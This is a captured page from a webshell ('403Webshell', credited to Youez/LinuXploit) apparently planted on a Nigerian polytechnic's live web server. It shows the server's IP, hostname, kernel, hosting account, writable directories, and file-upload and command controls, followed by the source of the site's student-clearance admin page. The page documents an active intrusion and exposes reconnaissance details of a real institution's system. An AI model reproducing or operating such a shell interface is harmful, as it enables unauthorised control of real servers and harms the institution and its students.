403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.69.58.211
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_student/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_student/clearStudent.php
<?php
ob_start();
include('headMain.php');
require_once('../connect.php');
$db=db_connect();

?>

    <div class="row">
        <div class="col-lg-10"></div>
        <div class="col-lg-8 col-lg-offset-2">
            <div class="panel panel-default">
                <div class="panel-heading">
                   <h3> Clear student for Registration </h3>
                </div>
                <div class="panel-body">

                    <div class="row">
                        <div class="col-lg-8 col-lg-offset-2">


<div>
    <?php
    if (isset($_GET['id'])){
        if ($_GET['id']==1){
            echo '<div  class="alert alert-success"  align="center" ><button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button> Matric No Added Successfully</div>';
        }elseif($_GET['id']==2){
            echo ' <div class="alert alert-danger"  align="center" ><button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>Record Failed</div>';
        }elseif($_GET['id']==3){
            echo ' <div class="alert alert-danger"  align="center" ><button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>Matric No Not Exist</div>';
        }elseif($_GET['id']==4){
        echo ' <div class="alert alert-danger"  align="center" ><button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>Matric No Already Added</div>';
        }
    }
    ?>
</div>
                <fieldset>
                    <form id="form1" role="form" name="form1" method="POST" action="clearStudent_process.php">
                      <div> Enter Student Matric Number:<input type="text" name="matNo" class="form-control"></div>

                        <br>
                        <div><input type="submit" class="btn btn-primary form-control" value="Activate For Registration"></div>
                      </form>
                    </fieldset>



                            </div>
                        </div>
    </div>
    </div>
    </div>
    </div>

<?php
include('footMain.php');
ob_end_flush();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit